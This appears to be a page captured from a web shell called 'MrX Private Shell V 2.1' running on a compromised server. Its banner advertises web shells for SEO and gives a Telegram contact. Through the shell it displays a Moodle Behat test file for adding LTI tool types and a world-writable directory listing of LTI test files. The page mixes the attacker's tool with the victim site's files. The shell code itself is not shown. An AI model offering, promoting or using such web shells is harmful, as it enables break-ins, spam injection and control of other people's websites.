__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@mod @mod_lti
Feature: Configure tool types
In order to allow teachers to add external LTI tools
As an admin
I need to be able to add, remove and configure tool types
Background:
Given I log in as "admin"
And I navigate to "Plugins > Activity modules > External tool > Manage tools" in site administration
@javascript
Scenario: Add a tool type from a cartridge URL
When I set the field "url" to local url "/mod/lti/tests/fixtures/ims_cartridge_basic_lti_link.xml"
And I press "Add Legacy LTI"
Then I should see "Enter your consumer key and shared secret"
And I press "Save changes"
And I should see "Example tool"
@javascript
Scenario: Try to add a non-existant cartridge
When I set the field "url" to local url "/mod/lti/tests/fixtures/nonexistant.xml"
And I press "Add Legacy LTI"
Then I should see "Enter your consumer key and shared secret"
And I press "Save changes"
And I should see "Failed to create new tool. Please check the URL and try again."
@javascript
Scenario: Attempt to add a tool type from a configuration URL, then cancel
When I set the field "url" to local url "/mod/lti/tests/fixtures/tool_provider.php"
And I press "Add Legacy LTI"
Then I should see "Cancel"
And I press "cancel-external-registration"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| addtool.feature | File | 8.77 KB | 0777 |
|
| backup_restore.feature | File | 3.68 KB | 0777 |
|
| contentitem.feature | File | 1.78 KB | 0777 |
|
| contentitemregistration.feature | File | 1.61 KB | 0777 |
|
| lti_activity_completion.feature | File | 2.93 KB | 0777 |
|
| lti_completion_pass_grade.feature | File | 3.74 KB | 0777 |
|
| managecoursetools.feature | File | 17.52 KB | 0777 |
|
| renametool.feature | File | 905 B | 0777 |
|
| restricttocategory.feature | File | 5.62 KB | 0777 |
|
| siteadmin_managetool_breadcrumbs.feature | File | 2.58 KB | 0777 |
|
| toolconfigure.feature | File | 1.28 KB | 0777 |
|
| viewtools.feature | File | 1.08 KB | 0777 |
|